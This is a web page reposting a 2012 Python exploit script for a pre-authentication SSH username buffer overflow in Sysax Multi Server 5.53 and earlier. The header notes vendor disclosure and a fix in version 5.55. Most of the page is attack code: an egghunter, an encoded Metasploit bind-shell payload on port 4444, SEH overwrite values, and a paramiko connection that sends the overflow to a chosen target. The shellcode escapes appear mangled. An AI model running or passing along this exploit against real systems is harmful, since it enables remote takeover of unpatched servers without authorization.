Home / exploits Sysax 5.53 SSH Username Buffer Overflow Exploit
Posted on 28 February 2012
#!/usr/bin/python ########################################################################################################## #Title: Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter) #Author: Craig Freyman (@cd1zz) #OS Tested: XP SP3 32bit, 2003 Server SP2 (No DEP) #Software Versions Tested: 5.53, 5.52, 5.50 #Date Discovered: Febrary 22, 2012 #Vendor Contacted: Febrary 23, 2012 #Vendor Response: February 27, 2012 #Vendor Fix: Sysax 5.55 #Detailed Exploit Description:http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html ########################################################################################################## import paramiko,os,sys if len(sys.argv) != 3: print "[+] Usage: ./filename <Target IP> <Port>" sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) egghunter = ( "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05" "x5ax74xefxb8x44x4ex57x50x8bxfaxafx75xeaxaf" "x75xe7xffxe7") # msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e -e x86/alpha_mixed X shell = ("DNWPDNWP" "x89xe0xdaxdfxd9x70xf4x5bx53x59x49x49x49x49" "x49x49x49x49x49x49x43x43x43x43x43x43x37x51" "x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" "x41x42x32x42x42x30x42x42x41x42x58x50x38x41" "x42x75x4ax49x69x6cx68x68x6dx59x77x70x57x70" "x57x70x33x50x4fx79x39x75x70x31x7ax72x62x44" "x4cx4bx52x72x70x30x6ex6bx32x72x44x4cx4cx4b" "x36x32x74x54x6ex6bx71x62x34x68x64x4fx78x37" "x42x6ax76x46x54x71x39x6fx35x61x49x50x4ex4c" "x77x4cx61x71x31x6cx66x62x64x6cx75x70x39x51" "x58x4fx34x4dx66x61x4fx37x6bx52x6cx30x73x62" "x30x57x4cx4bx36x32x64x50x4cx4bx63x72x77x4c" "x57x71x7ax70x6ex6bx61x50x72x58x6fx75x79x50" "x61x64x50x4ax63x31x48x50x30x50x4cx4bx53x78" "x56x78x6ex6bx50x58x51x30x35x51x59x43x69x73" "x57x4cx73x79x4cx4bx47x44x6ex6bx47x71x79x46" "x44x71x4bx4fx35x61x79x50x6cx6cx39x51x5ax6f" "x76x6dx47x71x78x47x75x68x6bx50x33x45x39x64" "x64x43x73x4dx4cx38x37x4bx31x6dx45x74x64x35" "x39x72x32x78x4cx4bx30x58x45x74x47x71x48x53" "x50x66x4cx4bx36x6cx42x6bx4ex6bx56x38x75x4c" "x47x71x39x43x4ex6bx56x64x4ex6bx33x31x68x50" "x6bx39x70x44x76x44x77x54x43x6bx71x4bx35x31" "x36x39x30x5ax30x51x4bx4fx4dx30x70x58x31x4f" "x42x7ax4cx4bx55x42x6ax4bx4dx56x63x6dx70x68" "x50x33x36x52x45x50x67x70x70x68x31x67x31x63" "x45x62x71x4fx31x44x61x78x52x6cx62x57x51x36" "x53x37x59x6fx4bx65x6fx48x6ex70x56x61x67x70" "x77x70x76x49x68x44x43x64x50x50x73x58x45x79" "x6bx30x32x4bx65x50x49x6fx49x45x62x70x72x70" "x76x30x70x50x53x70x66x30x67x30x46x30x45x38" "x48x6ax36x6fx39x4fx59x70x39x6fx78x55x4ex69" "x49x57x36x51x6bx6bx52x73x50x68x56x62x77x70" "x66x71x31x4cx4fx79x6bx56x51x7ax36x70x72x76" "x32x77x65x38x4bx72x6bx6bx64x77x71x77x4bx4f" "x4ex35x50x53x56x37x73x58x6cx77x38x69x37x48" "x69x6fx39x6fx78x55x63x63x30x53x31x47x62x48" "x30x74x78x6cx57x4bx79x71x6bx4fx79x45x76x37" "x4cx49x6fx37x55x38x73x45x72x4ex50x4dx43x51" "x39x6fx59x45x73x58x42x43x50x6dx43x54x75x50" "x4dx59x59x73x70x57x30x57x73x67x36x51x38x76" "x51x7ax57x62x42x79x36x36x5ax42x6bx4dx31x76" "x49x57x61x54x47x54x37x4cx67x71x53x31x4cx4d" "x67x34x77x54x74x50x7ax66x37x70x51x54x52x74" "x52x70x71x46x70x56x43x66x32x66x50x56x42x6e" "x50x56x46x36x61x43x43x66x53x58x73x49x58x4c" "x37x4fx4dx56x4bx4fx78x55x6fx79x69x70x30x4e" "x50x56x51x56x39x6fx76x50x61x78x63x38x4ex67" "x67x6dx71x70x59x6fx49x45x6dx6bx68x70x4fx45" "x4ex42x62x76x72x48x4cx66x4ex75x6dx6dx6dx4d" "x6bx4fx6ax75x37x4cx63x36x63x4cx45x5ax6fx70" "x39x6bx39x70x52x55x37x75x6dx6bx63x77x75x43" "x74x32x72x4fx51x7ax77x70x50x53x69x6fx38x55" "x41x41") padding1 = "x90" * 50 padding2 = "x90" * 50 nseh = "x90x90xebx80" seh = "x69x26x40x00" #00402669 PPR sysaxservd.exe junk = "A" * (9204 - len(egghunter + padding1 + padding2 + shell)) buff = junk + shell + padding1 + egghunter + padding2 + nseh + seh print "============================================================================" print " Sysax <= 5.53 SSH Username BoF Pre Auth RCE " print " by cd1zz " print " www.pwnag3.com " print "============================================================================" try: transport = paramiko.Transport((host, port)) except: print "[X] Unable to connect to " + host + " on port " + str(port) sys.exit(1) transport = paramiko.Transport((host, port)) print "[+] Launching exploit against " + host + " on port " + str(port) print "[+] Done!" transport.connect(username = buff, password = "pwnag3") transport.close()
